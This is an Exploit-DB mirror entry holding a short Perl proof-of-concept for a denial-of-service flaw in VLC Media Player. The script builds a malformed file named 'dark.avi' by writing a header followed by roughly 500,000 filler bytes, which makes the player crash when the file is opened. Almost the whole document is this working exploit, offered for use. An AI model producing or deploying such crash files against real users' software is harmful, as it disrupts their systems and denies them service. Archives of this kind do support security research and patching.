exploit-db-mirror/exploits/windows/dos/37462.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
424 B
Perl
Executable file

source: https://www.securityfocus.com/bid/54208/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
#!/usr/bin/perl
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;
my $file = "dark.avi";
open ($File, ">$file");
print $File $h,$d;
close ($File);